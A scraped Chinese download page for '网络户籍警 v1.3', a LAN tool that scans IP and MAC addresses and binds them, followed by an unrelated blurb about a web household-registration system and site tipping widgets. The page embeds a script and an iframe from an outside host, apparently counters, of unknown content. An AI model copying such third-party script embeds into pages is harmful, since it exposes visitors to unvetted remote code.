网络户籍警 v1.3 下载

Welcome to my blog!
<script language="javascript" src="http://avss.b15.cnwg.cn/count/count.asp"></script>
网络户籍警 v1.3<||>





软件大小:

6518 KB



软件语言:

简体中文



软件类别:

国产软件 / 免费版 / 网络监测



应用平台:

Win9x/NT/2000/XP/2003



界面预览:





插件情况:


 



投诉







更新时间:

2003-11-06 14:23:14



下载次数:

22733



推荐等级:






联 系 人:


heliemail
163.com




开 发 商:网络户籍警 v1.3>作者空间:






    局域网管理软件,自动扫描网内IP、mac地址、机器名称,并对新发现的机器自动保存在数据库中。对IP和MAC地址进行绑定,每次扫描时进行合法性检查,作出报告。并支持信使服务。是企业局域网管理人员的绝佳助手。
下载
src="http://avss.b15.cnwg.cn/count/iframe.asp" frameborder="0" scrolling="no" height="80">
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Web户籍管理系统的源码是基于Web技术开发的一套用于管理人口户籍信息的系统的程序代码。它的主要功能包括人员信息的录入、查询、修改、删除等操作,能够帮助户籍管理部门进行高效的工作。 该系统源码的主要特点包括以下几个方面: 1. 前端界面美观:系统采用了现代化的UI设计,使用户界面简洁、直观,易于操作。 2. 后台数据管理:系统使用数据库来存储和管理人口户籍信息,可以高效地对数据进行增删改查操作,确保数据的安全性和完整性。 3. 多级权限管理:根据用户角色的不同,系统设定了多级权限,实现不同用户对户籍信息的访问和操作权限的控制,保护了数据的隐私和安全。 4. 数据统计与报表生成:系统可以对人口信息进行统计分析,生成各种报表,供决策者参考,提高管理决策的科学性和准确性。 5. 全网访问:该系统是基于Web技术开发的,可以通过网络访问,实现了全网范围内的信息共享与交流,方便户籍管理部门与其他相关部门的信息对接。 总之,Web户籍管理系统的源码是一套功能完善、界面友好、操作方便的人口户籍信息管理系统的程序代码,可以提高户籍管理部门的工作效率和服务水平,实现信息化管理。同时,该系统也为其他相关部门的数据对接提供了便利,促进了信息的共享与交流,为社会管理提供了支持。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值